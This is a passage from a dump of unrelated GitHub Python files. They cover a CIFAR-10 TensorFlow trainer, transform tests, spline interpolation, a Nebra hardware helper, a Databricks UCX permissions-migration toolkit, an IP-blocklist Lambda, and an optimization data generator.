print(\"Visualizing augmented data\")\n fig = visualize_cf10(train_data[50000:], train_labels[50000:])\n fig.suptitle('Samples of Augmented Data', fontsize=20)\n plt.ion()\n plt.show()\n plt.pause(0.001)\n input(\"Press [enter] to continue.\")\n \n \n print(\"Generating Bar Chart of Augmented Data\")\n fig = plot_cf10_data(train_labels[50000:])\n fig.suptitle('Bar Chart of Augmented Data', fontsize=20)\n plt.ion()\n plt.show()\n plt.pause(0.001)\n input(\"Press [enter] to continue.\")\n\n #Plot colour distribution of all the data\n\n print(\"Plotting color distribution 
of Train data\")\n fig = plot_color_dist(train_data)\n fig.suptitle('Color Histogram of Training Data', fontsize=20)\n plt.ion()\n plt.show()\n plt.pause(0.001)\n input(\"Press [enter] to continue.\")\n \n print(\"Plotting color distribution of Test data\")\n fig = plot_color_dist(test_data)\n fig.suptitle('Color Histogram of Test Data', fontsize=20)\n plt.ion()\n plt.show()\n plt.pause(0.001)\n input(\"Press [enter] to continue.\")\n \n\n return train_data, train_labels, test_data, test_labels\n \n\n\ndef evaluate(accuracy_operation,x,y,X_data, y_data,batch_size):\n \"\"\"Evaluate accuracy of training\n Args:\n accuracy_operation: Accuracy operation\n x: TF Placeholder for x data\n y: TF Placeholder for y data\n X_data: ndarray of training X data\n y_data: ndarray of labels\n Returns: Accuracy\n \"\"\"\n num_examples = len(X_data)\n total_accuracy = 0\n sess = tf.get_default_session()\n generator = image_generator(X_data,y_data,batch_size)\n for offset in range(math.floor(num_examples/batch_size)):\n batch_x, batch_y = next(generator)\n accuracy = sess.run(accuracy_operation, feed_dict={x: batch_x, y: batch_y})\n total_accuracy += (accuracy * len(batch_x))\n return total_accuracy / num_examples\n\n\n\ndef train(train_data, train_labels,epochs,batch_size,cross_entropy_count, validation_count):\n \n x = tf.placeholder(tf.float32, (None, 32, 32,1))\n y = tf.placeholder(tf.int32, (None))\n dropout_rate = tf.placeholder(tf.float32,[], (None))\n one_hot_y = tf.one_hot(y, 10)\n\n learning_rate = 0.001\n dropout = 0.5\n \n #logits, cross entropy loss and optimization functions\n logits = train_model(x,dropout_rate=dropout_rate)\n cross_entropy = tf.nn.softmax_cross_entropy_with_logits(logits=logits, labels=one_hot_y)\n loss_operation = tf.reduce_mean(cross_entropy)\n optimizer = tf.train.AdamOptimizer(learning_rate = learning_rate)\n training_operation = optimizer.minimize(loss_operation)\n\n\n correct_prediction = tf.equal(tf.argmax(logits, 1, name=\"logits\"), tf.argmax(one_hot_y, 1, name=\"labels\"))\n accuracy_operation = tf.reduce_mean(tf.cast(correct_prediction, tf.float32))\n\n\n\n X_train, X_valid, y_train, y_valid = train_test_split(train_data, train_labels, test_size=0.1, random_state=42)\n\n\n saver = tf.train.Saver()\n with tf.Session() as sess:\n sess.run(tf.global_variables_initializer())\n num_examples = len(X_train)\n\n print(\"Training...\")\n count=1\n for i in range(epochs):\n generator = image_generator(X_train,y_train,batch_size)\n print(\"Epoch {}/{}\".format(i+1,epochs))\n\n for offset in range(math.floor(num_examples/batch_size)):\n batch_x, batch_y = next(generator)\n sess.run(training_operation, feed_dict={x: batch_x, y: batch_y, dropout_rate: dropout})\n if(count%cross_entropy_count==0):\n cross_entropy_loss = sess.run(loss_operation, feed_dict={x: batch_x, y: batch_y, dropout_rate: dropout}) \n print(\"Cross Entropy loss count {}: {}\".format(count,cross_entropy_loss))\n count+=1\n if(count%validation_count==0):\n validation_accuracy = evaluate(accuracy_operation,x,y,X_valid, y_valid,batch_size)\n print(\"EPOCH {} ...\".format(i+1))\n print(\"Validation Accuracy = {:.3f}\".format(validation_accuracy))\n print()\n\n\n\n\n saver.save(sess, './mynetwork')\n print(\"Model saved\")\n\ndef test_accuracy(test_data, test_labels):\n with tf.Session() as sess:\n saver = tf.train.Saver()\n saver.restore(sess, tf.train.latest_checkpoint('.'))\n\n test_accuracy = evaluate(test_data, test_labels)\n print(\"Test Accuracy = {:.3f}\".format(test_accuracy))\n\n\n \n\ndef main():\n 
parser = argparse.ArgumentParser(description='Run a training of cfar10 dataset.')\n parser.add_argument(\n 'images_path',\n type=str,\n help='Path to folder containing extracted cfar10 batches and labels for instance \"cfar10/\"'\n )\n parser.add_argument(\n '--b',\n type=int,\n default=128,\n help='Batch size: default=128.')\n parser.add_argument(\n '--e',\n type=int,\n default=10,\n help='Number of Epochs: default=10.')\n \n parser.add_argument(\n '--c',\n type=int,\n default=10,\n help='Number of Steps to run before showing Cross Entropy Loss: default=10')\n \n \n parser.add_argument(\n '--v',\n type=int,\n default=100,\n help='Number of Steps to run before showing validation loss: default=100')\n \n parser.add_argument(\n '--f',\n type=int,\n default=5,\n help='Fraction of total dataset to add through data augmentation: default=5')\n \n \n \n args = parser.parse_args()\n\n #run algorithm\n train_data, train_labels, test_data, test_labels = load_preprocess_and_visualize(args.images_path,args.f)\n train(train_data, train_labels, args.e, args.b, args.c, args.v)\n test_accuracy(test_data, test_labels)\n\n\nif __name__ == '__main__':\n main()\n\n\n\n\n\n","repo_name":"scneba/ClassificationTensorFlow","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":7574,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"54"} +{"seq_id":"72826287842","text":"# -----------------------------------------------------------\n# Test lead lag and multi-delayed transformations\n#\n# (C) 2020 Kevin Schlegel, Oxford, United Kingdom\n# Released under Apache License, Version 2.0\n# email kevinschlegel@cantab.net\n# -----------------------------------------------------------\nimport numpy as np\n\nfrom psfdataset.transforms.temporal import LeadLagTransformation\nfrom psfdataset.transforms.temporal import MultiDelayedTransformation\n\n\nclass TestLeadLag:\n def test_LeadLagTransformation(self):\n test_input = np.array([[[1, 2], [2, 3], [3, 4], [4, 5]]])\n # Test standard lead-lag transformation, delayed by 1 time step\n llt = LeadLagTransformation(1)\n expected = np.array([[[[1, 2], [1, 2]], [[2, 3], [1, 2]],\n [[2, 3], [2, 3]], [[3, 4], [2, 3]],\n [[3, 4], [3, 4]], [[4, 5], [3, 4]],\n [[4, 5], [4, 5]]]])\n output = llt(test_input)\n np.testing.assert_array_equal(output, expected)\n assert output.dtype == test_input.dtype\n\n # Test lead lag with bigger delay interval\n llt = LeadLagTransformation(2)\n expected = ([[[[1, 2], [1, 2], [1, 2]], [[2, 3], [1, 2], [1, 2]],\n [[2, 3], [2, 3], [1, 2]], [[2, 3], [2, 3], [2, 3]],\n [[3, 4], [2, 3], [2, 3]], [[3, 4], [3, 4], [2, 3]],\n [[3, 4], [3, 4], [3, 4]], [[4, 5], [3, 4], [3, 4]],\n [[4, 5], [4, 5], [3, 4]], [[4, 5], [4, 5], [4, 5]]]])\n output = llt(test_input)\n np.testing.assert_array_equal(output, expected)\n\n # Test a 1D input\n test_input = np.array([[[1], [2], [3]]])\n exp = np.array([[[[1], [1], [1]], [[2], [1], [1]], [[2], [2], [1]],\n [[2], [2], [2]], [[3], [2], [2]], [[3], [3], [2]],\n [[3], [3], [3]]]])\n output = llt(test_input)\n np.testing.assert_array_equal(output, exp)\n assert isinstance(llt.get_description(), dict)\n\n def test_MultiDelayedTransformation(self):\n test_input = np.array([[[1, 2], [2, 3], [3, 4], [4, 5]]])\n # Test the with just a single time step delay\n mdt = MultiDelayedTransformation(1)\n expected = np.array([[[[1, 2], [0, 0]], [[2, 3], [1, 2]],\n [[3, 4], [2, 3]], [[4, 5], [3, 4]],\n [[0, 0], [4, 5]]]])\n output = mdt(test_input)\n np.testing.assert_array_equal(output, 
expected)\n assert output.dtype == test_input.dtype\n\n # Test with multiple time step delay\n mdt = MultiDelayedTransformation(2)\n exp = np.array([[[[1, 2], [0, 0], [0, 0]], [[2, 3], [1, 2], [0, 0]],\n [[3, 4], [2, 3], [1, 2]], [[4, 5], [3, 4], [2, 3]],\n [[0, 0], [4, 5], [3, 4]], [[0, 0], [0, 0], [4, 5]]]])\n output = mdt(test_input)\n np.testing.assert_array_equal(output, exp)\n assert isinstance(mdt.get_description(), dict)\n","repo_name":"kschlegel/PSFDataset","sub_path":"tests/test_leadlag.py","file_name":"test_leadlag.py","file_ext":"py","file_size_in_byte":3040,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"54"} +{"seq_id":"5495934952","text":"import numpy\n\n\ndef input_values():\n ##### EXAMPLES #####\n\n # def function(x): return numpy.tan(x)\n #\n # left_border, dots_count, right_border = 0, 6, 1.5\n\n # def function(x): return numpy.sinh(x)\n #\n # left_border, dots_count, right_border = 0, 6, 2\n\n ##### EXAMPLES #####\n\n def function(x): return numpy.cosh(x) # func of my var\n\n left_border, dots_count, right_border = 0, 6, 2\n\n dots = []\n for i in range(dots_count):\n x = left_border + (right_border - left_border) * i / (dots_count - 1)\n y = function(x)\n dots += [(x, y)]\n\n return dots, function\n\n\nprint(\"Интерполяция сплайнами\\n\")\n\ndots, f = input_values()\n(x, y) = map(list, zip(*dots))\nprint(\"(x,y) =\", dots, '\\n')\n\n\ndef triple_diagonal_solve(A, b):\n A = A.copy()\n b = b.copy()\n n = len(A)\n\n A[0][1] /= A[0][0]\n for i in range(1, n - 1):\n A[i][i + 1] /= (A[i][i] - A[i][i - 1] * A[i - 1][i])\n\n b[0] /= A[0][0]\n for i in range(1, n):\n b[i] = (b[i] - A[i][i - 1] * b[i - 1]) / (A[i][i] - A[i][i - 1] * A[i - 1][i])\n\n x = numpy.zeros(n)\n x[-1] = b[-1]\n for i in range(n - 2, -1, -1):\n x[i] = b[i] - A[i][i + 1] * x[i + 1]\n\n return x\n\n\ndef spline_method(dots):\n n = len(dots) - 1\n (x, y) = map(list, zip(*dots))\n\n h = [None]\n for i in range(1, n + 1):\n h += [x[i] - x[i - 1]]\n\n A = [[None] * (n) for i in range(n)]\n for i in range(1, n):\n for j in range(1, n):\n A[i][j] = 0.0\n for i in range(1, n - 1):\n A[i + 1][i] = h[i + 1]\n for i in range(1, n):\n A[i][i] = 2 * (h[i] + h[i + 1])\n for i in range(1, n - 1):\n A[i][i + 1] = h[i + 1]\n\n F = []\n for i in range(1, n):\n F += [3 * ((y[i + 1] - y[i]) / h[i + 1] - (y[i] - y[i - 1]) / h[i])]\n\n A = [A[i][1:] for i in range(len(A)) if i]\n\n c = triple_diagonal_solve(A, F)\n c = [0.0] + list(c) + [0.0]\n\n def evaluate(x_dot):\n for i in range(1, len(x)):\n if x[i - 1] <= x_dot <= x[i]:\n val = 0\n val += y[i]\n b = (y[i] - y[i - 1]) / h[i] + (2 * c[i] + c[i - 1]) * h[i] / 3\n val += b * (x_dot - x[i])\n val += c[i] * ((x_dot - x[i]) ** 2)\n d = (c[i] - c[i - 1]) / (3 * h[i])\n val += d * ((x_dot - x[i]) ** 3)\n return val\n return None\n\n def output():\n print(\"Кубический сплайн: \", '\\n')\n for i in range(1, len(x)):\n val = 0\n b = (y[i] - y[i - 1]) / h[i] + (2 * c[i] + c[i - 1]) * h[i] / 3\n d = (c[i] - c[i - 1]) / (3 * h[i])\n print(x[i - 1], x[i], )\n print(numpy.poly1d([d, c[i], b, y[i]]), '\\n')\n\n return evaluate, output\n\n\nspl, cout = spline_method(dots)\n\ncout()\n\nx_dot = 1.0 # my variant & second example\n# x_dot = 0.75 # first example\nprint(f\"Исходная функция от ({x_dot}) = \", f(x_dot))\nprint(f\"Кубический сплайн от ({x_dot}) = \", spl(x_dot))\nprint(f\"Дельта от ({x_dot}) = \", abs(f(x_dot) - 
spl(x_dot)))\n","repo_name":"Artyom-Gerchik/MchaLabs","sub_path":"LAB7/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3115,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"26244319278","text":"\"\"\"\nThis module provides a set of functions to extract information about\nthe Single Board Computer in use.\nIt considers Balena environment variables as primary source of truth.\nIt also uses the device tree to extract information about the SBC.\n\"\"\"\n\nimport os\nfrom enum import Enum, auto\nfrom collections import namedtuple\n\nSBCInfo = namedtuple('SBCInfo', ['vendor_id', 'vendor_name', 'model_name'])\n\n\nclass DeviceVendorID(Enum):\n \"\"\"\n Enum for device vendors.\n \"\"\"\n INVALID = auto()\n ROCK_PI = auto()\n RASPBERRY_PI = auto()\n BOBCAT_PX30 = auto()\n BOBCAT_RK3566 = auto()\n\n\n# Pulled from\n# https://www.balena.io/docs/reference/base-images/devicetypes/\nBALENA_ENV_RASPBERRY_PI_MODELS = [\n 'raspberry-pi',\n 'raspberry-pi2',\n 'raspberrypi3',\n 'raspberrypi3-64',\n 'raspberrypi4-64',\n 'nebra-hnt',\n 'raspberrypicm4-ioboard',\n 'raspberrypi0-2w-64'\n]\n\nBALENA_ENV_ROCKPI_MODELS = ['rockpi-4b-rk3399']\n\nBALENA_ENV_BOBCATPX30_MODELS = ['isg-503']\n\nBALENA_ENV_BOBCATRK3566_MODELS = ['rockpro64']\n\nBALENA_MODELS = {\n DeviceVendorID.BOBCAT_PX30: BALENA_ENV_BOBCATPX30_MODELS,\n DeviceVendorID.BOBCAT_RK3566: BALENA_ENV_BOBCATRK3566_MODELS,\n DeviceVendorID.ROCK_PI: BALENA_ENV_ROCKPI_MODELS,\n DeviceVendorID.RASPBERRY_PI: BALENA_ENV_RASPBERRY_PI_MODELS\n}\n\nCOMMERCIAL_FLEETS = [\n 156, # Bobcat PX30\n 161, # Bobcat RK3566\n 56, # Controllino\n 106, # COTX\n 53, # Finestra\n 31, # Nebra Indoor 868MHz\n 40, # Nebra Indoor RockPi 868MHz\n 119, # Nebra Indoor 915MHz\n 58, # Nebra Indoor RockPi 915MHz\n 62, # Linxdot\n 42, # Linxdot RKCM3\n 143, # Midas\n 145, # Nebra indoor1\n 147, # Nebra indoor2\n 148, # Nebra outdoor1\n 149, # Nebra outdoor2\n 52, # Helium OG\n 80, # Nebra Outdoor 868MHz\n 107, # Nebra Outdoor 915MHz\n 47, # PantherX\n 66, # Pisces\n 73, # Pycom\n 88, # RAK\n 114, # RisingHF\n 124, # Sensecap\n 90, # Syncrobit\n 126, # Syncrobit RKCM3\n 98, # Nebra Indoor Testing\n 158, # Bobcat PX30 Testing\n 163, # Bobcat RK3566 Testing\n 127, # Controllino Testing\n 87, # COTX Testing\n 76, # Finestra Testing\n 132, # Linxdot Testing\n 84, # Linxdot RKCM3 Testing\n 144, # Midas Testing\n 128, # Helium OG Testing\n 41, # PantherX Testing\n 43, # Pisces Testing\n 116, # Pycom Testing\n 113, # RAK Testing\n 103, # RisingHF Testing\n 60, # Nebra RockPi Testing\n 137, # Sensecap Testing\n 57, # Syncrobit Testing\n 111, # Syncrobit RKCM3 Testing\n 2006816, # Rob Testing\n 2061340, # Rob Testing\n]\n\nNON_COMMERCIAL_FLEETS = [\n 67, # dev-1\n 54, # dev-2\n 74, # dev-3\n 25, # devnet-01\n 26, # devnet-02\n 150, # devnet-03\n 153, # dev-sensorhub\n 121, # Bobcat PX30\n 160, # Bobcat RK3566\n 105, # Controllino\n 136, # COTX\n 99, # Disputed\n 118, # Finestra\n 109, # Indoor 470\n 39, # Indoor 868\n 134, # Indoor 868 RockPi\n 91, # Indoor 915\n 122, # Indoor 915 RockPi\n 46, # Linxdot\n 68, # Linxdot RKCM3\n 138, # Midas\n 3, # Indoor1\n 27, # Indoor2\n 28, # Outdoor1\n 29, # Outdoor2\n 104, # OG\n 79, # Outdoor 470\n 63, # Outdoor 868\n 133, # Outdoor 915\n 94, # Outdoor 915 RockPi\n 32, # Panther X1\n 71, # Pisces\n 83, # Pycom\n 78, # RAK\n 85, # RisingHF\n 101, # Sensecap\n 130, # Syncrobit\n 69, # Syncrobit RKCM3\n 123, # Testnet\n 157, # Bobcat PX30 Testnet\n 162, # Bobcat RK3566 Testnet\n 102, # 
Controllino Testnet\n 86, # COTX Testnet\n 77, # Finestra Testnet\n 117, # Linxdot Testnet\n 110, # Linxdot RKCM3 Testnet\n 139, # Midas Testnet\n 70, # OG Testnet\n 129, # Panther X1 Testnet\n 125, # Pisces Testnet\n 131, # Pycom Testnet\n 36, # RAK Testnet\n 55, # Rising HF Testnet\n 95, # RockPi Testnet\n 75, # Sensecap Testnet\n 97, # Syncrobit Testnet\n 37, # Syncrobit RKCM3 Testnet\n 22, # Indoor2 Testnet\n]\n\nNEBRA_API_URL = \"https://api.cloud.nebra.com\"\n\ndef device_model():\n with open('/proc/device-tree/model', 'r') as f:\n return f.readline().strip()\n\n\ndef sbc_info() -> SBCInfo:\n '''\n return SBCInfo formed by reading '/proc/device-tree/model'\n '''\n sbc_info = SBCInfo(vendor_id=DeviceVendorID.INVALID, vendor_name='', model_name='')\n dev_model = device_model()\n if dev_model.lower().find('raspberry') >= 0:\n sbc_info = SBCInfo(vendor_id=DeviceVendorID.RASPBERRY_PI,\n vendor_name='Raspberry Pi',\n model_name=dev_model)\n elif dev_model.lower().find('rk3566') >= 0:\n sbc_info = SBCInfo(vendor_id=DeviceVendorID.BOBCAT_RK3566,\n vendor_name='Bobcat',\n model_name=dev_model)\n elif dev_model.lower().find('rock') >= 0:\n sbc_info = SBCInfo(vendor_id=DeviceVendorID.ROCK_PI,\n vendor_name='Radxa Rock Pi',\n model_name=dev_model)\n elif dev_model.lower().find('px30') >= 0:\n sbc_info = SBCInfo(vendor_id=DeviceVendorID.BOBCAT_PX30,\n vendor_name='Bobcat',\n model_name=dev_model)\n return sbc_info\n\n\ndef is_sbc_type(device_id: DeviceVendorID) -> bool:\n '''\n Return true if the sbc matches the type supplied.\n '''\n device_type = os.getenv('BALENA_DEVICE_TYPE')\n\n # use device tree supplied model name if evn not set\n if not device_type:\n return sbc_info().vendor_id == device_id\n\n # honor env override\n return device_type in BALENA_MODELS.get(device_id, [])\n\n\ndef is_commercial_fleet() -> bool:\n '''\n Return true if the device is in a commercial fleet. Otherwise return false.\n '''\n fleet_name = os.environ.get('BALENA_APP_NAME')\n fleet_id = int(os.environ.get('BALENA_APP_ID'))\n\n if not fleet_name.endswith('-c') or fleet_id not in COMMERCIAL_FLEETS:\n return False\n\n return True\n\n\ndef is_nebra_fleet() -> bool:\n '''\n Return true if the device is in a Nebra Cloud fleet. 
Otherwise return false.\n '''\n api_url = os.environ.get('BALENA_API_URL')\n fleet_id = int(os.environ.get('BALENA_APP_ID'))\n\n if (api_url != NEBRA_API_URL) or (fleet_id not in COMMERCIAL_FLEETS and fleet_id not in NON_COMMERCIAL_FLEETS):\n return False\n\n return True\n","repo_name":"NebraLtd/hm-pyhelper","sub_path":"hm_pyhelper/sbc.py","file_name":"sbc.py","file_ext":"py","file_size_in_byte":6386,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"71097600803","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\n\nA = np.load('Documents/att3ntions93.npy')\n\nb=[]\nfor i in range(16):\n b.append([])\nfor r in A:\n s = np.argsort(r)[:16]\n for i in range(len(s)):\n b[i].append(s[i])\n\nc={}\nfor i,k in enumerate(b):\n c[i]={}\n for idx in k:\n if idx not in c[i].keys(): c[i][idx]=0\n else: c[i][idx]+=1\n\nd={}\nfor k,v in c.items():\n for kk,vv in c[k].items():\n if kk not in d.keys(): d[kk]=0\n d[kk]+= ((100-k)/100)*(vv+1)\n\nregions = {76:'left frontal pole', 75:'left supremarginal gyrus', 74:'left superior temporal gyrus', 77:'left temporal pole', 72:'left superior frontal gyrus', 73:'left superior parietal lobule', 78:'left transverse temporal gyrus', 79:'left insula', 71:'left rostral middle frontal gyrus', 70:'left ronstral anterior cingulate cortex', 69:'left precuneus', 68:'left precentral gyrus', 81:'right banks of the superior temporal sulcus', 67:'left posterior cingulate cortex', 66:'left postcentral gyrus', 83:'right caudal middle frontal gyrus'}\n\ne = dict([(regions[k],v/max(d.values())) for k,v in d.items() if k in regions.keys()])\nsv = sorted(e.values(), reverse=True)\n\nf={}\nfor s in sv:\n for k,v in e.items():\n if v==s:\n f[k]=v\n\nsns.set(style=\"whitegrid\")\nfig, ax = plt.subplots(figsize=(6, 15))\n# sns.set_color_codes(\"pastel\")\npal = sns.cubehelix_palette(len(f.keys()))\n# cmap = sns.cubehelix_palette(as_cmap=True)\nsns.barplot(x=list(f.values()), y=list(f.keys()),\n label=\"Region Weighting\", palette=np.array(pal[::-1]))\nplt.savefig('Documents/attentions.png',bbox_inches='tight')\n","repo_name":"xtianmcd/GCNeuro","sub_path":"attentions_analy.py","file_name":"attentions_analy.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"54"} +{"seq_id":"620059848","text":"import logging\n\nfrom databricks.sdk import WorkspaceClient\nfrom databricks.sdk.service import sql\n\nfrom databricks.labs.ucx.config import WorkspaceConfig\nfrom databricks.labs.ucx.framework.crawlers import (\n RuntimeBackend,\n SqlBackend,\n StatementExecutionBackend,\n)\nfrom databricks.labs.ucx.workspace_access.generic import (\n GenericPermissionsSupport,\n authorization_listing,\n experiments_listing,\n listing_wrapper,\n models_listing,\n workspace_listing,\n)\nfrom databricks.labs.ucx.workspace_access.groups import GroupManager\nfrom databricks.labs.ucx.workspace_access.manager import PermissionManager\nfrom databricks.labs.ucx.workspace_access.redash import (\n SqlPermissionsSupport,\n redash_listing_wrapper,\n)\nfrom databricks.labs.ucx.workspace_access.scim import ScimSupport\nfrom databricks.labs.ucx.workspace_access.secrets import SecretScopesSupport\nfrom databricks.labs.ucx.workspace_access.verification import VerificationManager\n\n\nclass GroupMigrationToolkit:\n def __init__(self, config: WorkspaceConfig, *, warehouse_id=None):\n self._configure_logger(config.log_level)\n\n ws = 
WorkspaceClient(config=config.to_databricks_config())\n ws.api_client._session.adapters[\"https://\"].max_retries.total = 20\n self._verify_ws_client(ws)\n self._ws = ws # TODO: remove this once notebooks/toolkit.py is removed\n\n generic_acl_listing = [\n listing_wrapper(ws.clusters.list, \"cluster_id\", \"clusters\"),\n listing_wrapper(ws.cluster_policies.list, \"policy_id\", \"cluster-policies\"),\n listing_wrapper(ws.instance_pools.list, \"instance_pool_id\", \"instance-pools\"),\n listing_wrapper(ws.warehouses.list, \"id\", \"sql/warehouses\"),\n listing_wrapper(ws.jobs.list, \"job_id\", \"jobs\"),\n listing_wrapper(ws.pipelines.list_pipelines, \"pipeline_id\", \"pipelines\"),\n listing_wrapper(experiments_listing(ws), \"experiment_id\", \"experiments\"),\n listing_wrapper(models_listing(ws), \"id\", \"registered-models\"),\n workspace_listing(ws, num_threads=config.num_threads, start_path=config.workspace_start_path),\n authorization_listing(),\n ]\n redash_acl_listing = [\n redash_listing_wrapper(ws.alerts.list, sql.ObjectTypePlural.ALERTS),\n redash_listing_wrapper(ws.dashboards.list, sql.ObjectTypePlural.DASHBOARDS),\n redash_listing_wrapper(ws.queries.list, sql.ObjectTypePlural.QUERIES),\n ]\n generic_support = GenericPermissionsSupport(ws, generic_acl_listing)\n sql_support = SqlPermissionsSupport(ws, redash_acl_listing)\n secrets_support = SecretScopesSupport(ws)\n scim_support = ScimSupport(ws)\n self._permissions_manager = PermissionManager(\n self._backend(ws, warehouse_id),\n config.inventory_database,\n [generic_support, sql_support, secrets_support, scim_support],\n self._object_type_appliers(generic_support, sql_support, secrets_support, scim_support),\n )\n self._group_manager = GroupManager(ws, config.groups)\n self._verification_manager = VerificationManager(ws, secrets_support)\n\n @staticmethod\n def _object_type_appliers(generic_support, sql_support, secrets_support, scim_support):\n return {\n # SCIM-based API\n \"entitlements\": scim_support,\n \"roles\": scim_support,\n # Generic Permissions API\n \"authorization\": generic_support,\n \"clusters\": generic_support,\n \"cluster-policies\": generic_support,\n \"instance-pools\": generic_support,\n \"sql/warehouses\": generic_support,\n \"jobs\": generic_support,\n \"pipelines\": generic_support,\n \"experiments\": generic_support,\n \"registered-models\": generic_support,\n \"notebooks\": generic_support,\n \"files\": generic_support,\n \"directories\": generic_support,\n \"repos\": generic_support,\n # Redash equivalent of Generic Permissions API\n \"alerts\": sql_support,\n \"queries\": sql_support,\n \"dashboards\": sql_support,\n # Secret Scope ACL API\n \"secrets\": secrets_support,\n }\n\n @staticmethod\n def _backend(ws: WorkspaceClient, warehouse_id: str | None = None) -> SqlBackend:\n if warehouse_id is None:\n return RuntimeBackend()\n return StatementExecutionBackend(ws, warehouse_id)\n\n @staticmethod\n def _verify_ws_client(w: WorkspaceClient):\n _me = w.current_user.me()\n is_workspace_admin = any(g.display == \"admins\" for g in _me.groups)\n if not is_workspace_admin:\n msg = \"Current user is not a workspace admin\"\n raise RuntimeError(msg)\n\n @staticmethod\n def _configure_logger(level: str):\n ucx_logger = logging.getLogger(\"databricks.labs.ucx\")\n ucx_logger.setLevel(level)\n\n def prepare_environment(self):\n self._group_manager.prepare_groups_in_environment()\n\n def cleanup_inventory_table(self):\n self._permissions_manager.cleanup()\n\n def inventorize_permissions(self):\n 
self._permissions_manager.inventorize_permissions()\n\n def apply_permissions_to_backup_groups(self):\n self._permissions_manager.apply_group_permissions(\n self._group_manager.migration_groups_provider, destination=\"backup\"\n )\n\n def verify_permissions_on_backup_groups(self, to_verify):\n self._verification_manager.verify(self._group_manager.migration_groups_provider, \"backup\", to_verify)\n\n def replace_workspace_groups_with_account_groups(self):\n self._group_manager.replace_workspace_groups_with_account_groups()\n\n def apply_permissions_to_account_groups(self):\n self._permissions_manager.apply_group_permissions(\n self._group_manager.migration_groups_provider, destination=\"account\"\n )\n\n def verify_permissions_on_account_groups(self, to_verify):\n self._verification_manager.verify(self._group_manager.migration_groups_provider, \"account\", to_verify)\n\n def delete_backup_groups(self):\n self._group_manager.delete_backup_groups()\n","repo_name":"rohit-db/ucx","sub_path":"src/databricks/labs/ucx/workspace_access/migration.py","file_name":"migration.py","file_ext":"py","file_size_in_byte":6229,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"54"} +{"seq_id":"73680376481","text":"'''\nIP Filter lambda\n'''\nfrom lambda_ip_filter.get_ip import getBaseIP\n\n\nurl ='https://raw.githubusercontent.com/firehol/blocklist-ipsets/master/blocklist_de.ipset'\n\n#Read IP from IPset\nclient_whitelisted_ip = getBaseIP(url)\n\ndef lambda_handler(event, context):\n try:\n \n ip_match = []\n non_ip_address_match = []\n ip_array = event[\"ip_address\"]\n\n for ip in ip_array:\n if ip in client_whitelisted_ip:\n ip_match.append(ip)\n else:\n non_ip_address_match.append(ip)\n \n response = {\n \"status\": 200,\n \"body\": {\n \"number_of_matching_ip\": len(ip_match),\n \"number_of_non_matching_address\": len(non_ip_address_match),\n \"ip_address_match\": ip_match,\n \"ip_address_non_match\": non_ip_address_match\n }\n }\n \n return response\n \n except Exception as e:\n \n response = {\n \"status\": \"500\",\n \"message\": f\"An error occured: {str(e)}\",\n }","repo_name":"adefemi171/ip-white-list","sub_path":"lambda_ip_filter/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1080,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"54"} +{"seq_id":"2888466901","text":"import gurobipy as gp \nimport numpy as np \nimport networkx as nx\n\n\nimport pickle\nimport sys\nimport datetime\nimport math\nfrom sklearn import preprocessing\nfrom sklearn.metrics import confusion_matrix\nimport logging \nimport time\nfrom collections import defaultdict\nfrom sklearn.metrics import mean_squared_error as mse\nfrom scipy.special import expit, logit\nimport copy\n\ntrue=True\nrand=np.random.binomial\n\n\n''' Helper functions to generate opt problem \n'''\ndef zeros(d1,d2):\n return np.zeros([d1,d2])\ndef vcat(a1,a2):\n return np.vstack([a1,a2])\ndef ones(*args): \n return np.ones(list(args))\n\ndef length(x): \n return len(x)\ndef convert_grid_to_list(dim1, dim2):\n g = nx.grid_2d_graph(dim1, dim2)\n sources = []; destinations = []\n nodelist=[node for node in g.nodes]\n n_edges = len([e for e in g.edges])\n scalar_nodes = dict( zip(nodelist,range(len(nodelist))))\n tuple_nodes = dict( zip(range(len(nodelist)), nodelist) )\n print(scalar_nodes)\n for e in g.edges:\n sources += [scalar_nodes[e[0]]]\n destinations += [scalar_nodes[e[1]]]\n # unit test\n# print([(tuple_nodes[sources[i]], tuple_nodes[destinations[i]]) for i in 
range(len(sources))])\n# print(g.edges)\n return sources, destinations, scalar_nodes, tuple_nodes\n\n\n###########\n# Generate data \n\n\"\"\"\ngenerate_poly_kernel_data(B_true, n, degree; inner_constant=1, outer_constant = 1, kernel_damp_normalize=true,\n kernel_damp_factor=1, noise=true, noise_half_width=0, normalize_c=true)\n\nGenerate (X, c) from the polynomial kernel model X_{ji} ~ N(0, 1) and\nc_i(j) = ( (alpha_j * B_true[j,:] * X[:,i] + inner_constant)^degree + outer_constant ) * epsilon_{ij} where\nalpha_j is a damping term and epsilon_{ij} is a noise term.\n\n# Arguments\n- `kernel_damp_normalize`: if true, then set\nalpha_j = kernel_damp_factor/norm(B_true[j,:]). This results in\n(alpha_j * B_true[j,:] * X[:,i] + inner_constant) being normally distributed with\nmean inner_constant and standard deviation kernel_damp_factor.\n- `noise`: if true, generate epsilon_{ij} ~ Uniform[1 - noise_half_width, 1 + noise_half_width]\n- `normalize_c`: if true, normalize c at the end of everything\n\"\"\"\ndef generate_poly_kernel_data_simple(B_true, n, degree, inner_constant=1, outer_constant = 1, kernel_damp_normalize=true,\nkernel_damp_factor=1, noise=true, noise_half_width=0, normalize_c=true, normalize_small_threshold = 0.0001):\n\n (d, p) = B_true.shape\n X_observed = np.random.randn(p, n)\n dot_prods = B_true@X_observed\n # first generate c_observed without noise\n c_observed = zeros(d, n)\n for j in range(d):\n cur_kernel_damp_factor = kernel_damp_factor\n for i in range(n): \n c_observed[j, i] = (cur_kernel_damp_factor*dot_prods[j, i] + inner_constant)**degree + outer_constant\n if noise:\n epsilon = (1 - noise_half_width) + 2*noise_half_width*np.random.random()\n c_observed[j, i] = c_observed[j, i]*epsilon\n return X_observed, c_observed\n\ndef 